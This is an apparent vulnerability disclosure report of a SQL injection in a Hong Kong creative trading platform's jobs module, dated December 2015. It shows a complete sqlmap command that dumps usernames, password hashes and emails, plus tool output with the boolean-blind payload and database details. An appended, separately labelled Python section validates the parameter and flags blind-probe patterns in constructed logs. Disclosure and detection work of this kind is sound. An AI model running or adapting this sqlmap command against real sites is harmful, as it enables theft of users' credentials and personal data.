2015-12-03: Details have been sent to the vendor and are awaiting the vendor's handling
2015-12-08: The vendor has actively ignored the vulnerability; details are disclosed to the public

Hong Kong creative trading platform main site has a SQL injection vulnerability (passwords and e-mails of over 10,000 users)

Address: http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883
$ python sqlmap.py -u "http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883" -p rid --technique=B --random-agent --batch --no-cast -Danyidea_anyidea01 -T xoops_users -C uname,pass,name,email --dump --start 1 --stop 10
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
current user: 'anyidea_anyidea@localhost'
current user is DBA: False
database management system users [1]:
[*] 'anyidea_anyidea'@'localhost'

Database: anyidea_anyidea01
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| xoops_users | 10364   |
+-------------+---------+

[Full table listings for anyidea_anyidea01 and information_schema with per-table row counts omitted.]

columns LIKE 'pass' were found in the following databases:
Database: anyidea_anyidea01
Table: xoops_users_20130711  [1 column]  pass
Table: supe_members          [1 column]  password
Table: cms_sys               [1 column]  password
Table: xoops_users           [1 column]  pass
Table: cdb_members           [1 column]  password

Database: anyidea_anyidea01
Table: xoops_users
[37 columns]  (schema omitted; pass is varchar(32))
[10 entries]  (dump of uname, pass, name, email omitted; pass holds 32-character hashes, three of which sqlmap cracked against its wordlist)
Suggested fix: deploy a WAF.
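An added example, not part of the original report: a server-side validator for the rid parameter (the check that actually removes the injection, where a WAF only filters it) and a scan over constructed access-log lines that flags boolean-blind probes shaped like the logged payload. The endpoint path and parameter name come from the report; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the report.
ENDPOINT = "/modules/jobs/index2.php"
PARAM = "rid"

# A resume id is a plain decimal string (the report's legitimate value is
# 00000000883). Rejecting anything else server-side, or binding it as an
# integer in a prepared statement, closes the injection; a WAF only filters it.
def valid_rid(value: str) -> bool:
    return re.fullmatch(r"[0-9]{1,20}", value) is not None

# Boolean-blind probes append a comparison to the id, as in sqlmap's logged
# payload "rid=00000000883 AND 5794=5794".
BLIND_PROBE = re.compile(r"\b(and|or)\b\s*\(?\s*\d+\s*=\s*\d+", re.IGNORECASE)

def classify_request(target: str) -> str:
    """Return 'ok', 'invalid' or 'blind-probe' for one request target."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return "ok"
    for v in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if not valid_rid(v):
            return "blind-probe" if BLIND_PROBE.search(v) else "invalid"
    return "ok"

REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(text: str) -> list:
    """Return (client_ip, verdict) for every request that is not 'ok'."""
    findings = []
    for line in text.splitlines():
        m = REQ_LINE.search(line)
        if m and (verdict := classify_request(m.group(1))) != "ok":
            findings.append((line.split()[0], verdict))
    return findings

# Constructed Apache access-log lines (not from the report): one normal
# request, two sqlmap-style true/false probes, one malformed id.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2015:10:00:01 +0800] "GET /modules/jobs/index2.php?pa=viewResume&rid=00000000883 HTTP/1.1" 200 5120
203.0.113.9 - - [08/Dec/2015:10:00:02 +0800] "GET /modules/jobs/index2.php?pa=viewResume&rid=00000000883%20AND%205794=5794 HTTP/1.1" 200 5120
203.0.113.9 - - [08/Dec/2015:10:00:03 +0800] "GET /modules/jobs/index2.php?pa=viewResume&rid=00000000883%20AND%205794=5795 HTTP/1.1" 200 0
203.0.113.7 - - [08/Dec/2015:10:00:04 +0800] "GET /modules/jobs/index2.php?pa=viewResume&rid=abc HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for ip, verdict in scan_log(SAMPLE_LOG):
        print(ip, verdict)
```

The paired true/false probes from one client against the same id, with different response sizes, are the signature of blind enumeration and should page well before a dump of 10,364 rows completes.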
Severity: no impact (vendor ignored)
Ignored at: 2015-12-08 11:36
Vendor reply: none yet